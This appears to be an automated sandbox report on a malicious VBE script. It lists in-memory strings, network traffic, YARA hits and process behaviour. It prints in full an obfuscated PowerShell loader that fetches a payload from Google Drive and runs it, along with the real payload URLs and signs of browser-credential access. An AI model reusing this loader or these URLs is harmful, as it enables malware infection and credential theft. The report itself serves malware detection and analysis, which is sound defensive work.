Source: powershell.exe, 00000009.00000002.882848532717.0000021659E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.882848532717.000002165B100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: powershell.exe, 00000009.00000002.882848532717.0000021659E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.878906475177.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB7q
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.g
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.go
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goo
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goog
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googl
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.c
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.co
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/FP
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/u
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?e
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?ex
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?exp
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expo
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expor
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=d
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=do
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=dow
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=down
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downl
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downlo
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downloa
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&i
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1T
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Tu
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3p
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pG
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGV
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQ
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQO
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOu
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuY
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYu
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0P
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PV
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1v
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vu
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuO
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOo
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOov
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovP
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZ
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc7
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5
Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5pN
Source: wab.exe, 0000000F.00000002.882847947414.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882848779553.00000000053B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4
Source: wab.exe, 0000000F.00000002.882847947414.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4J
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005134000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download
Source: wab.exe, 0000000F.00000003.878864713619.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download
Source: wab.exe, 0000000F.00000003.880185049304.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=downloadDP
Source: wab.exe, 0000000F.00000002.882847947414.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=downloadSP
Source: powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000009.00000002.882848532717.000002165C0DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.882848532717.000002165B480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882926973942.0000021669E6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.882848532717.000002165B100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949

Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49952 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_6840.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6840, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5088	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_046B85F0	13_2_046B85F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_046B8EC0	13_2_046B8EC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_046B82A8	13_2_046B82A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C93960	15_2_22C93960
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C94978	15_2_22C94978
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C9961E	15_2_22C9961E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C9C850	15_2_22C9C850
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_22C93CA8	15_2_22C93CA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232CAD28	15_2_232CAD28
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232C8B18	15_2_232C8B18
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232C7BB1	15_2_232C7BB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232C0040	15_2_232C0040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_232C3C00	15_2_232C3C00
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E1C5C	16_2_007E1C5C
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E25D3	16_2_007E25D3

Yara signature match

Source: amsi32_6840.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6840, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBE@14/8@3/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Belleric74.Afs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:304:WilStaging_02

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmx2r0kx.r2f.ps1

Jump to behavior

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Command line argument: WABOpen		16_2_007E1C5C
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Command line argument: 5~		16_2_007E3530

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat 